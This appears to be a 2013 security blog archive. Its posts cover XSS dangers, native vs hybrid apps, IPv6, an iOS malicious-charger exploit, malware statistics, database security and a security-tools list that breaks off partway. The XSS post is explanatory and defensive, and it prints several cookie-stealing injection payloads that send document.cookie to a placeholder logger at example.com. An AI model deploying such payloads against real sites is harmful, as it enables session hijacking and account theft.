Saturday, 16 November 2013

THE DANGERS OF CROSS-SITE SCRIPTING (XSS)



THIS IS REALLY SERIOUS !!!


Cross-Site Scripting is the most common security vulnerability in today's websites.

Most web security professionals write off XSS because it does not involve remote code execution. They believe it is not a threat; nothing could be further from the truth.



First of all: "What Is XSS?"


XSS Stands for Cross-Site Scripting.
Essentially, XSS is an exploit where client-side script (usually JavaScript) is injected into a trusted page. I will get into how this is done a little later.

Client-side scripting (JavaScript) was intended to make web pages dynamic and interactive. JavaScript is used on the vast majority of websites today for just that purpose, as well as for more important features such as cookie handling, communicating with the server (AJAX and JSON), logging traffic (such as Google Analytics), and many other critical uses.

The problem arises when this highly useful and nearly universally supported language is used maliciously. Again, I will get into what can be done a little later.

But, in summary, XSS injects a malicious piece of client-side script (usually JavaScript, but VBScript and others are sometimes used). The injected code then runs in the victim's browser, in the context of the trusted page, and is used to attack the victim.




"How is this code injected?"



There are two essential types of XSS:
Non-Persistent
Persistent

1) Non-Persistent (Type-1):

This is when, due to improper data handling, script can be injected into a non-permanent part of a website, for example a search feature or an error page.

Scenario:

An attacker locates a way to inject script into a search feature, so that when the page states "No Posts Found For Keywords ____," the script is injected where the page echoes the keywords back.

The attacker then packages the exploit in a specially crafted link. She injects a cookie stealer and sends the link to a website administrator, who clicks it and has her administrative cookie stolen. The attacker can now pose as the administrator and make changes to the website, and in some cases change the password so that the real administrator cannot get back in.

Also, in some cases the attacker may be able to decode the cookie to recover the actual plaintext password. The attacker then leverages her server-side script access to get root access on the server.




2) Persistent (Type-2):

This is when, due to a poor filter, script can be injected into a permanent part of a site by a user, for example a comment, a blog post, or a profile.

Scenario:

An attacker, via a known injection, is able to replace his profile on MySpace with a fake login screen. The victim, not knowing that it is a fake (it looks exactly like the real one), logs in and has her password and email stolen. Many people use the same user name and password for everything, so the attacker now has access not only to her MySpace account, but to her email, bank, etc. The attacker can now essentially ruin her life, from a simple injection.



"What Can Happen If I Don't Fix It?"


There are any number of terrible things that can happen if an attacker exploits an XSS vulnerability.
But there are a few things that WILL happen:
Costs of fixing the problem WILL increase dramatically, due to the rushed nature of the work, extra damages, etc. Costs can go up many thousands of times, depending on the severity of the exploit.
Users WILL lose confidence in your website, and you WILL lose users.
There WILL be downtime.

But, as far as the specific things an attacker can do, here is a short list:
An attacker can use a cookie stealer to steal user accounts. This can even give an attacker administrative privileges on your website, or even root privileges on the server; then it's game over. They can do literally ANYTHING to your site or the server at that point.
A fake login page can be created to trick users into revealing private information.
Fake pages can be posted (DOM-based attack) that could be anything from a fake blog post, to a redirect to a shock site, to a more malicious page meant to slander the website. Remember, everyone will think that the page was posted by an official at your site.
Browser exploits can be used to gain control of victims' computers, install malware (viruses, spyware, etc.), or trick a user into installing dangerous software (grayware).
A fake page can also be used to social engineer (trick) a victim into revealing credit card, banking, SSN, or other sensitive personal information.
A clickjacking attack can be launched, to do any number of malicious things.

Remember, this is a VERY concise list; the actual list of possible attacks is endless.



"How is JavaScript used to do all of this?"


There is no one answer to this question; the number of attacks is so huge that it would be impossible to list them all here. But here are some of the popular ones:

A simple search engine injection:


yoursite.com/search.pl?q=%3Cscript%3Edocument.location%3D%22http%3A//example.com/logger.php%3Fcookie%3D%22+document.cookie%3B%3C/script%3E

All of that code at the end translates to:


<script>document.location="http://example.com/logger.php?cookie="+document.cookie;</script>

Simply put, this code redirects the browser to a malicious site, carrying the victim's cookie data in a GET variable (?cookie=). The evil site logs it, and the attacker then has your personal information.

A few variants on that would be:


Closing <title> tag, then inject script:


</title><script>document.location="http://example.com/logger.php?cookie="+document.cookie;</script>

Closing text input, link title, etc, then injecting script:

"><script>document.location="http://example.com/logger.php?cookie="+document.cookie;</script>

Iframe attack:


<iframe src="javascript:parent.document.location='http://example.com/logger.php?cookie='+parent.document.cookie;"></iframe>

Link Attack (executes when the link is clicked)


<a href="javascript:document.location='http://example.com/logger.php?cookie='+document.cookie;">CLICK ME!</a>

Attribute injection (executes when the mouse is moved anywhere on the page):

hi" style="position:absolute;top:0px;left:0px;height:100%;width:100%;display:block;z-index:400" onmousemove="document.location='http://example.com/logger.php?cookie='+document.cookie;

This results in code like:


<input type="text" value="hi" style="position:absolute;top:0px;left:0px;height:100%;width:100%;display:block;z-index:400" onmousemove="document.location='http://example.com/logger.php?cookie='+document.cookie;">




Inter-Block Injection:


hi";document.location='http://example.com/logger.php?cookie='+document.cookie;//

Resulting in JavaScript like:

var searchQuery = "hi";document.location='http://example.com/logger.php?cookie='+document.cookie;//";

That is just a tiny taste of the possible injections. To a skilled attacker, those are child's play, and far more sophisticated attacks can and will be created.
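As an added, defender-side example (not code from the original post), the following Node.js script renders a mock search page the way the vulnerable search.pl above does and, beside it, the hardened version, which applies a different encoder for each output context the injections above target: the HTML body where the keywords are echoed, the quoted value attribute of the text input, and the JavaScript string literal in var searchQuery. The payloads are the ones quoted above, embedded as constructed test input; the helper names (encodeHtml, encodeJsString, renderVulnerable, renderSafe and the three inspection functions) are this example's own.

```javascript
// Added example, not part of the original post: context-aware output encoding
// against the three injection contexts shown above (HTML body, quoted
// attribute, JavaScript string literal). All function names are this
// example's own.

// Encoder for HTML text content and double-quoted attribute values.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Encoder for a JavaScript string literal inside a <script> block.
// JSON.stringify escapes quotes and backslashes; <, > and & are additionally
// written as \uXXXX so the literal can never contain "</script>".
function encodeJsString(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026');
}

// Vulnerable renderer: reflects the query verbatim, like the search.pl above.
function renderVulnerable(q) {
  return `<title>Search</title>
<p>No Posts Found For Keywords ${q}</p>
<input type="text" value="${q}">
<script>var searchQuery = "${q}";</script>`;
}

// Hardened renderer: the same page, with the encoder matching each context.
function renderSafe(q) {
  return `<title>Search</title>
<p>No Posts Found For Keywords ${encodeHtml(q)}</p>
<input type="text" value="${encodeHtml(q)}">
<script>var searchQuery = ${encodeJsString(q)};</script>`;
}

// Payloads quoted in the post, embedded here as constructed test input.
const PAYLOADS = {
  script: '<script>document.location="http://example.com/logger.php?cookie="+document.cookie;</script>',
  attribute: 'hi" style="position:absolute;top:0px;left:0px;height:100%;width:100%;display:block;z-index:400" onmousemove="document.location=\'http://example.com/logger.php?cookie=\'+document.cookie;',
  jsString: 'hi";document.location=\'http://example.com/logger.php?cookie=\'+document.cookie;//',
};

// --- Inspection helpers: did the payload escape its context? ---

// Number of <script opening tags; the page itself has exactly one.
function countScriptTags(html) {
  return (html.match(/<script\b/g) || []).length;
}

// Text between the end of the input's value="..." attribute and the closing '>'.
// Empty means the value stayed one attribute; anything else is injected markup.
function inputAttributesAfterValue(html) {
  const start = html.indexOf('value="');
  if (start < 0) return null;
  const valueEnd = html.indexOf('"', start + 'value="'.length);
  const tagEnd = html.indexOf('>', valueEnd);
  return html.slice(valueEnd + 1, tagEnd);
}

// The value of searchQuery if its right-hand side is still a single string
// literal, or null if the payload broke out of it into JavaScript statements.
function searchQueryLiteral(html) {
  const m = html.match(/var searchQuery = (.*);<\/script>/);
  if (!m) return null;
  try {
    const v = JSON.parse(m[1]);
    return typeof v === 'string' ? v : null;
  } catch (e) {
    return null;
  }
}

// Stand-alone run: print both renderings for each payload.
for (const [name, p] of Object.entries(PAYLOADS)) {
  console.log(`--- ${name}: vulnerable ---\n${renderVulnerable(p)}`);
  console.log(`--- ${name}: hardened ---\n${renderSafe(p)}\n`);
}
```

The point of the three inspection helpers is that the same input is dangerous or harmless depending on where it lands: in the hardened output the script payload adds no second script tag, the attribute payload never closes the value attribute, and the string payload survives as exactly the text the user typed, which is what a search page should show. Encoding has to be chosen per context; an HTML-entity filter alone would not protect the JavaScript string.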



"Of course, MY small site will not be affected, no hacker has any interest in MY small site!"

This is a common misconception. Attackers often scan for common injections, and no site is spared. Even if the site gets no more than 2 visitors a month, an attacker will log the vulnerability and exploit it later, or sell it to a scammer.
In short, NO ONE is safe because of size.


"My site is so simple, there couldn't possibly be a security flaw in it."

Another common misconception. While the simpler the site, the less likely an XSS injection will be there, this does not mean your site is in any way safe.



"I used a popular paid/open source script so there can't be an XSS hole, if I paid for it, it simply can not have bad security." OR "I hired a PROFESSIONAL web developer, who is an expert in web security, if there was a problem, he would have known. This can not be a real threat if he didn't bother fixing it"

Quite possibly the most dangerous misconception of all. Web developers, whether MIT-educated or a 15-year-old neighbor, often do not understand the severity of XSS, or know how to fix it. In fact, MIT-educated web developers often forget to use proper filtering; they are only human. Even if they do know about the risk, they may simply forget to filter.

On the topic of paid scripts and open source scripts, they are often the most vulnerable. In fact, I located critical security flaws in multiple paid and open source shopping carts, not only XSS but other critical vulnerabilities, such as SQL injection and read exploits.




In short, no matter who made your website, or what your webmaster tells you, if there is an XSS exploit in your site, you are never safe. Period.

Wednesday, 11 September 2013

Native Apps VS Hybrid Apps !!!

What is a Native Application ?



Definition. Apps developed exclusively for a specific mobile platform that can leverage all device capabilities.


The inherent benefits are obvious. Native applications can leverage the full array of features and functions available through the mobile device’s core operating system. Generally, they are faster, smoother and offer a significantly more fluid user experience than either Hybrid apps or mobile Web apps.

Native mobile apps are built using the native programming language for the platform, for example iPhone or iPad apps built in Objective-C and Android applications built in Java. Native apps are fast, provide a better user experience and interface, and have access to all device features of the platform they are built for. On the down side, a native app can be used only on its specific platform, which restricts its reach. For example, an Android app cannot run on an iPhone and vice versa. If you want to cover a larger audience across all platforms, you will need separate native apps for each of them.


Instagram-Example of Native Applications



Angry Birds-Example of Native Applications


What is a Hybrid Application ?


Definition. Apps that wrap a mobile web interface inside a native container.

Today, technology changes so rapidly that most businesses require immense flexibility and scalability to adapt content, design and even application architecture, all on the fly. By deploying applications that rely on a robust combination of HTML5 Web technologies and native OS features, you preserve a large degree of control over the content and design of the solutions we build for mobile platforms.
We find that this process empowers our customers to perform fast, easy, on-demand updates, without losing the inherent advantages that come from hosting a solution in the iTunes Apps Store or the Android Marketplace.

While many confuse a hybrid app with a native app, there is a fundamental distinction. A hybrid application is built using web technology, and then wrapped in a platform-specific shell. The native shell not only makes it look like a native app and makes it eligible for the app stores; developers can also build some native functionality into it, to access native APIs and use device-specific hardware features to some extent. A hybrid app is basically an app developed with a combination of HTML5 and native technology. For cross-platform reach, developers need to code the native part separately for each platform, but they can use the same HTML5 part across all of them.

More in this video:





Now that we know what hybrid and native applications are, here is a comparison between them:


Comparing Native to Hybrid

The following table offers a matrix comparing the benefits and various features supported by native and hybrid mobile applications.

Feature | Native | Hybrid (PhoneGap)
Access to the Contacts or Address Book | Full support | All platforms except older Blackberry OS and WebOS
Access to the Accelerometer (motion detection) | Full support | Not supported on older Blackberry OS
Camera | Full support | Not supported on older Blackberry OS
Storing data locally and offline | Full support | All platforms except older Blackberry OS and Samsung Bada
Accessing network properties and conditions | Full support | Full support
Access to the local file system for saving and retrieving files (e.g. images) | Full support | All except Symbian, older Blackberry OS, WebOS and Bada
Access to Location / GPS data | Full support | Full support
Local notifications (alerts, vibration, sound) | Full support | Full support



And here's a video to learn more about those apps:


References and External Links:

Web Sites:

www.worklight.com

http://mobiloud.com/blog/2012/06/native-web-or-hybrid-apps/

http://www.cloudsherpas.com/services/custom-development/mobile-apps/native-hybrid-and-mobile-web-application-development/

http://www.mendix.com/blog/whats-the-big-deal-with-native-vs-web-vs-hybrid-applications/

http://sandhill.com/article/hybrid-or-native-mobile-app-development-six-key-considerations/

http://www.quora.com/Mobile-Applications/What-is-the-difference-between-HTML5-Native-and-a-Hybrid-app-Which-is-better

http://www.xcubelabs.com/blog/native-web-and-hybrid-apps-understanding-the-difference/

http://www.icenium.com/resources/forums/icenium-general-discussion/native-vs-hybrid-app

http://scn.sap.3com/thread/3365532

Video Links:

 
https://www.youtube.com/watch?v=Ns-JS4amlTc

https://www.youtube.com/watch?v=HDnNEKtBkBE

Wednesday, 5 June 2013

One Year After World IPv6 Launch, Number Of IPv6-Connected Internet Users Doubles



WASHINGTON, D.C., USA and GENEVA, SWITZERLAND – 3 June 2013 – The number of IPv6-connected users has doubled since World IPv6 Launch began on June 6, 2012, when thousands of Internet service providers (ISPs), home networking equipment manufacturers, and Web companies around the world came together to permanently enable the next generation of Internet Protocol (IPv6) for their products and services. This marks the third straight year IPv6 use on the global Internet has doubled. If current trends continue, more than half of Internet users around the world will be IPv6-connected in less than 6 years.

“The year since World IPv6 Launch began has cemented what we know will be an increasing reality on the Internet: IPv6 is ready for business,” said Leslie Daigle, the Internet Society’s Chief Internet Technology Officer. “Forward-looking network operators are successfully using IPv6 to reduce their dependency on expensive, complex network address translation systems (CGNs) to deal with a shortage of IPv4 addresses. Leaders of organizations that aspire to reach all Internet users must accelerate their IPv6 deployment plans now, or lose an important competitive edge.”

As IPv6 adoption continues to grow, members of the worldwide Internet community are contributing to its deployment. Statistics reported by World IPv6 Launch participants underscore the increasing deployment of IPv6 worldwide:

• Google reports the number of visitors to its sites using IPv6 has more than doubled in the past year.
• The number of networks that have deployed IPv6 continues to grow, with more than 100 worldwide reporting significant IPv6 traffic.
• Australian ISP Internode reports that 10 percent of its customers now use IPv6 to access the Internet.
• Akamai reports that it is currently delivering approximately 10 billion requests per day over IPv6, which represents a 250 percent growth rate since June of last year.
• KDDI measurement shows that the number of IPv6 users of KDDI has doubled and that IPv6 traffic has increased approximately three times from last year.

World IPv6 Launch participants have worked together to help drive adoption, leading to the creation of World IPv6 Day in 2011, in which hundreds of websites joined together for a successful global 24-hour test flight of IPv6. This was followed by World IPv6 Launch in 2012, in which more than a thousand participants permanently enabled IPv6 for their products and services, including four of the most visited websites: Google, Facebook, YouTube, and Yahoo!.

As a platform for innovation and economic development, the Internet plays a critical role in the daily lives of billions. This momentum has not slowed — IPv6 adoption continues to skyrocket, fast establishing itself as the “new normal” and a must-have for any business with an eye towards the future.

For more information about companies that have deployed IPv6, as well as links to useful information for users and how other companies can participate in the continued deployment of IPv6, please visit: http://www.worldipv6launch.org

About the need for IPv6

IPv4 has approximately four billion IP addresses (the sequence of numbers assigned to each Internet-connected device). The explosion in the number of people, devices, and web services on the Internet means that IPv4 is running out of space. IPv6, the next-generation Internet protocol which provides more than 340 trillion, trillion, trillion addresses, will connect the billions of people not connected today and will help ensure the Internet can continue its current growth rate indefinitely.

Hacking Your iPhone From Your Charger !!!

Researchers Say They Can Hack Your iPhone With A Malicious Charger



Careful what you put between your iPhone and a power outlet: That helpful stranger’s charger may be injecting your device with more than mere electrons.
At the upcoming Black Hat security conference in late July, three researchers at the Georgia Institute of Technology plan to show off a proof-of-concept charger that they say can be used to invisibly install malware on a device running the latest version of Apple’s iOS.
Though the researchers aren’t yet sharing the details of their work, a description of their talk posted to the conference website describes the results of the experiment as “alarming. Despite the plethora of defense mechanisms in iOS, we successfully injected arbitrary software into current-generation Apple devices running the latest operating system (OS) software,” their talk summary reads. “All users are affected, as our approach requires neither a jailbroken device nor user interaction.”
The researchers’ malicious charger, which they’re calling “Mactans” in what seems to be a reference to the scientific name of the Black Widow spider, is built around an open-source single-board computer known as a BeagleBoard, sold by Texas Instruments for a retail price of around $45. “This hardware was selected to demonstrate the ease with which innocent-looking, malicious USB chargers can be constructed,” the researchers write.
It’s not clear just how convincing that charger will be, of course, given that a three-inch square BeagleBoard can’t fit into the smaller power adaptors Apple sells for charging its gadgets, like the one shown above. But a BeagleBoard could be hidden in a docking station or external battery, and the team hints that others with more resources may be able to advance their work: “While Mactans was built with [a] limited amount of time and a small budget, we also briefly consider what more motivated, well-funded adversaries could accomplish.”
When I spoke by phone Friday with Yeongjin Jang, one of the Georgia Tech researchers, he told me that the team had contacted Apple about their exploit, but hadn’t yet heard back from the company, and declined to comment further. I reached out to Apple, too, and will update this post if the company responds.
The researchers write that their attack can compromise an iOS device running the most recent version of Apple’s mobile operating system in less than a minute. They add that they can also demonstrate that the malware infection resulting from their malicious charger is persistent and tough to spot. “We show how an attacker can hide their software in the same way Apple hides its own built-in applications,” reads their description.
The Georgia Tech researchers would be far from the first to hack iOS devices via their USB connections. The devices’ combined data and power port has been the most common point of entry for hackers seeking to jailbreak their devices to remove Apple’s default restrictions on their devices. The “evasi0n” jailbreak released by a group of iOS hackers in February, for instance, took advantage of a flaw in iOS’s mobile backup system as well as four other bugs to dismantle the devices’ security measures.
That jailbreak was used more than 18 million times by iOS users eager to hack their iPhones, iPads and iPod touches before Apple updated its software to block the exploit in March. Given that Georgia Tech is demonstrating a far less friendly technique, expect Apple to move fast to patch the bugs they're exposing.

Trojan Causes 80 percent of computers infected worldwide


Panda Security recently announced the release of its quarterly report for Q1 2013, which states that more than six million new malware samples were launched between January and March of this year, and that Trojans represent three out of every four new malware samples in circulation during the same period.
The report also says that Trojans were responsible for about 79.99 percent of all computer infections worldwide. “Trojans are cyber crooks' weapon of choice, which explains why they account for most new specimens in circulation and infections triggered in the first quarter of the year,” Panda Labs technical director Luis Corrons said in a statement.





According to the report, more than 30.31 percent of computers worldwide are infected. China has the largest share, with 50 percent of computers infected, followed by Ecuador at 41.01 percent, Turkey at 40.38 percent, Argentina at 37.77 percent, Peru at 37.43 percent, and Taiwan at 36.48 percent. Conversely, Finland has the fewest infections, at 17 percent, followed by Sweden at 20 percent, Switzerland at 20.99 percent, the United Kingdom at 21.89 percent, Norway at 22.57 percent, and Japan at 22.82 percent.
Warning: use standard anti-virus software to shield your computer.


Tuesday, 28 May 2013

Why we need IPv6 now and what it means for network security



Thomas Edison, in 1882, opened a power station on Pearl Street in New York City to supply the densely populated island of Manhattan with DC power [1]. DC was the logical power distribution standard at the time: easily generated and safely distributed across the limited geographic area it was intended to supply. Soon a fierce debate about power standards followed. From it emerged what we now know as the electricity grid. AC, alternating current, won out for a pretty simple reason: it scaled. It could be expanded into a large interconnected network. Omnipresent, reliable electric power continued to drive our economy and innovation.

Today's Internet is undergoing a similar debate. The original Internet standard communications protocol (“IPv4”, or “Internet Protocol Version 4”) was conceived in the 70s and 80s. Its intent was to interconnect research universities and government facilities. It was never intended to be today's global business network. The memory of computers connected to the early Internet was measured in kilobytes [2]. Connectivity between facilities was frequently provided by dialup modems. We have outgrown every single one of these specifications by orders of magnitude. The most apparent limitation of IPv4 is its lack of address space. Designed for a limited number of research campuses, IPv4 provides up to 4 billion addresses. IPv4 was never designed to have all 4 billion addresses used, and certainly not to supply the current world population of 7 billion [3]. Today, the number of devices connected to the Internet exceeds the number of people alive [4]. The current use (and overuse) of addresses causes delays and difficulties in routing Internet traffic and limits the growth of the Internet, in particular in emerging markets. Mobile technologies are held back because network providers cannot assign routable addresses to every mobile device.

Time to rethink. IPv6 (Internet Protocol Version 6) is about to ring in a new age for the Internet. It not only substantially increases the number of addresses, but also enables more efficient routing, the efficient use of modern hardware, and the ability to support modern networking concepts like mobility. If it is so great, why is everybody so slow in adopting it? If it is not broken, don't fix it! The current IPv4 Internet is working just well enough. Network operators around the globe don't see the need to upgrade equipment and learn about new technology unless customers demand it.

Just like when Tesla advocated AC power back around the turn of the century, and Edison stole cats and dogs across Manhattan to electrocute them in a public demonstration of the danger of AC power, much of today's fear of IPv6 is based on the assumption that IPv6 is insecure [5]. We barely learned how to somewhat secure our IPv4 networks. Understandably, network administrators are hesitant to throw out the operational experience gained in running IPv4 networks. But in addition to the new complexities and changes brought by IPv6, there are a number of important security improvements. IPv4 was not designed to be secure. The standard originally defining IPv4, known as “RFC 791”, specifically states that there are “no mechanisms to augment end-to-end data reliability, …” [6]. Features like virtual private networks with encryption, reliable routing and authentication were bolted on later and never properly integrated. IPv6, however, integrates these later additions properly, and even provides for future expansion in an organized way.

There are a number of important security features that are either already implemented in IPv6, or that are on the drawing board for the near future:
IPSec (encrypted VPNs) is now a mandatory component. IPSec still needs to be configured properly, but at least it is now universally available.
A plethora of addresses allows for logical and functional address assignment. We no longer need to design subnet sizes around “what's available”; we can now design networks that make sense.
Addresses with different scopes allow for the proper isolation of hosts.
Simplified rules for fragmentation make it easier to defend diverse networks with different network technologies.
If desired, end-to-end connectivity without reliance on “NAT” (Network Address Translation) will allow for a simpler configuration of end-to-end encrypted networks.
Addresses will no longer be shared among different devices, allowing for easier attribution of network traffic and simpler asset control.
Using an extension that is so far not widely implemented, it will be possible to create addresses cryptographically and validate them on the local network [7].
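As an added example (not from the original article or its cited sources), the following Node.js script illustrates the address-scope point in the list above: it parses textual IPv6 addresses into their eight 16-bit groups, classifies them by the well-known prefixes (link-local fe80::/10, unique local fc00::/7, multicast ff00::/8 with its scope nibble, loopback, IPv4-mapped, the 2001:db8::/32 documentation range, global unicast 2000::/3) and derives an ingress-filter decision from that: only global unicast sources are plausible on an Internet-facing interface, so the scope of an address tells a firewall which hosts may never be talking to it from outside. The function names and the sample addresses are this example's own; the embedded dotted-quad notation (::ffff:192.0.2.1) is not handled.

```javascript
// Added example, not from the original article: classify IPv6 addresses by
// scope and derive an ingress-filter decision. Function names are this
// example's own; embedded dotted-quad notation is not handled.

// Parse an IPv6 address into an array of eight 16-bit groups, or null if the
// text is not a valid address (at most one '::', 1-4 hex digits per group).
function parseIPv6(text) {
  if (typeof text !== 'string') return null;
  if ((text.match(/::/g) || []).length > 1) return null;
  const [head, tail] = text.split('::');
  const compressed = tail !== undefined;
  const headParts = head === '' ? [] : head.split(':');
  const tailParts = !compressed || tail === '' ? [] : tail.split(':');
  if (!compressed && headParts.length !== 8) return null;
  if (compressed && headParts.length + tailParts.length > 7) return null;
  const zeros = compressed ? new Array(8 - headParts.length - tailParts.length).fill('0') : [];
  const groups = [];
  for (const p of [...headParts, ...zeros, ...tailParts]) {
    if (!/^[0-9a-fA-F]{1,4}$/.test(p)) return null;
    groups.push(parseInt(p, 16));
  }
  return groups;
}

// Scope/kind of an address, following the well-known prefix assignments.
function classifyIPv6(text) {
  const g = parseIPv6(text);
  if (!g) return 'invalid';
  if (g.every((x) => x === 0)) return 'unspecified';                              // ::
  if (g.slice(0, 7).every((x) => x === 0) && g[7] === 1) return 'loopback';      // ::1
  if (g.slice(0, 5).every((x) => x === 0) && g[5] === 0xffff) return 'ipv4-mapped'; // ::ffff:0:0/96
  if ((g[0] & 0xffc0) === 0xfe80) return 'link-local';                           // fe80::/10
  if ((g[0] & 0xfe00) === 0xfc00) return 'unique-local';                         // fc00::/7
  if ((g[0] & 0xff00) === 0xff00) return 'multicast';                            // ff00::/8
  if (g[0] === 0x2001 && g[1] === 0x0db8) return 'documentation';                // 2001:db8::/32
  if ((g[0] & 0xe000) === 0x2000) return 'global-unicast';                       // 2000::/3
  return 'reserved';
}

// Multicast scope nibble (1 = interface-local, 2 = link-local, 5 = site-local,
// 8 = organization-local, e = global); null for non-multicast addresses.
function multicastScope(text) {
  const g = parseIPv6(text);
  if (!g || (g[0] & 0xff00) !== 0xff00) return null;
  return g[0] & 0x000f;
}

// Ingress policy for an Internet-facing interface: only global unicast
// sources are plausible; link-local, unique-local, loopback, unspecified,
// mapped, multicast and documentation sources are bogons and should be dropped.
function acceptableInternetSource(text) {
  return classifyIPv6(text) === 'global-unicast';
}

// Constructed sample addresses; 2001:4860:4860::8888 is Google Public DNS,
// the rest are reserved or example ranges.
const SAMPLES = ['::', '::1', '::ffff:c000:201', 'fe80::1', 'fd12:3456::1',
  'ff02::1', '2001:db8::1', '2001:4860:4860::8888', '1::2::3'];
for (const a of SAMPLES) {
  console.log(a.padEnd(24), classifyIPv6(a).padEnd(16), acceptableInternetSource(a) ? 'accept' : 'drop');
}
```

The classifier orders its checks from most specific to least specific, so the unspecified, loopback and mapped forms (all of which start with zero groups) are recognised before the prefix masks run; reversing that order would misfile ::1 under "reserved". The same table of prefixes is what an ingress ACL encodes when it drops bogon sources at the border.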

These are just some of the more prominent security features built into IPv6. Needless to say, network administrators need to gain experience with these features and learn to use them. Luckily, IPv4 and IPv6 can operate next to each other, and we don't need to switch over in one day. June 6th has been designated “IPv6 day” by the Internet Society [8]. Many large web sites will be reachable via IPv6 starting June 6th. How long will it take to “cut over”, and when will we be able to “turn off” IPv4? Con Edison, the New York power company that emerged out of Edison's first attempts in Manhattan, disconnected its last DC cutovers in 2007, 125 years after the network was originally implemented. That's about 12 years in “Internet Time”.

[1] http://cityroom.blogs.nytimes.com/2007/11/14/off-goes-the-power-current-started-by-thomas-edison/
[2] http://www-03.ibm.com/ibm/history/exhibits/mainframe/mainframe_intro2.html
[3] http://www.census.gov/main/www/popclock.html
[4] http://blogs.cisco.com/news/the-internet-of-things-infographic/
[5] http://theoatmeal.com/comics/tesla
[6] http://www.ietf.org/rfc/rfc791.txt
[7] http://ipv6.com/articles/research/Secure-Neighbor-Discovery.htm
[8] http://www.worldipv6day.org/



To learn more about IPv6, also see https://isc.sans.edu/ipv6videos

What Every Database Administrator Should Know About Security


To say that there is friction between security professionals and database administrators (DBAs) is putting it mildly.

Database administrators are both the caretakers of database platforms and the managers of data. Very seldom are they also security experts. In many enterprises, the DBA and the security team find themselves at odds because the DBA is judged on availability and ease of use, not security. Yet the security team advocates controls that restrict access, add complexity and slow database performance. That's not a recipe for keeping end users happy, and DBAs tend to bear the brunt of criticism.

Databases hold a majority of the sensitive data within most enterprises, and have been a prime target for attackers for more than a decade. The considerable skills database administrators bring to the table are often marginalized, with security teams failing to leverage these valuable skills because they feel DBAs lack the "security mindset" needed to comprehend wickedly resourceful attackers who target enterprise data. Security does not trust DBAs because they feel DBAs lack an understanding of the problems at hand.

Bridging the gap between DBAs and security professionals--bringing their respective strengths into play--can only make a company more resilient. The goal is to educate DBAs on the problems security teams are trying to address, and to arm them with enough information so that they can both appreciate the motivation of security requirements and help propose implementations that secure data while not smashing performance and productivity. In this way, DBAs and security pros can work together to create database environments that are not only functional, but highly secure.

The first step in this process is to talk about what most DBAs don't know. To better close the gap between security and database management, let's address the issues of why security is important and some of the key reasons security teams don't work closely with DBAs.

DBAs are not vulnerability researchers.


As a database administrator, it's likely you don't understand half of the vulnerabilities databases are exposed to. That's not meant as an insult--even within the security community, vulnerability research is a specialized sub-discipline practiced by only a handful of people. With that said, it's important that you follow these issues if you want to understand why security teams ask you to implement specific security controls. Much in the same way you need to understand how bugs affect the database, or how some settings affect stability and performance, you need a basic understanding of vulnerabilities.

Essentially, there are three critical things you need to know about any vulnerability: which feature is/was at risk; the basic methods attackers use to exploit the vulnerability; and whether the vulnerability requires credentials to exploit. You can learn more from CERT/Mitre announcements, vendor security announcements and vendor best practices, as well as from following security and/or database blogs.

Hackers know databases as well as you do.


Hackers spend hundreds of hours examining specific features. They work tirelessly to understand how these features work and, more importantly, how a feature can be made to misbehave. They understand the internal workings of the database, and usually how a feature's documented specification differs from the implementation.

There's no such thing as a "minor database vulnerability no one else knows about." Attackers are aware of potential flaws, and they will know how to probe your database to see if it's vulnerable to those flaws.

To read more key points that database administrators should know about security -- and how security people can communicate them -- download the free report.

Top 15 Security/Hacking Tools & Utilities



1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.

Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.

Can be used by beginners (-sT) or by pros alike (--packet-trace). A very versatile tool, once you fully understand the results.

Get Nmap Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.

Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

Get Nessus Here



3. John the Ripper

Yes, JTR 1.7 was recently released!

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

You can get JTR Here

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner; there are some other tools that go well with Nikto (focused on HTTP fingerprinting, Google hacking/info gathering etc.), but that is another article.

Get Nikto Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Get SuperScan Here

6. p0f

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

– machines that connect to your box (SYN mode),
– machines you connect to (SYN+ACK mode),
– machines you cannot connect to (RST+ mode),
– machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.

Get p0f Here

7. Wireshark (Formerly Ethereal)

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.

Get Wireshark Here

8. Yersinia

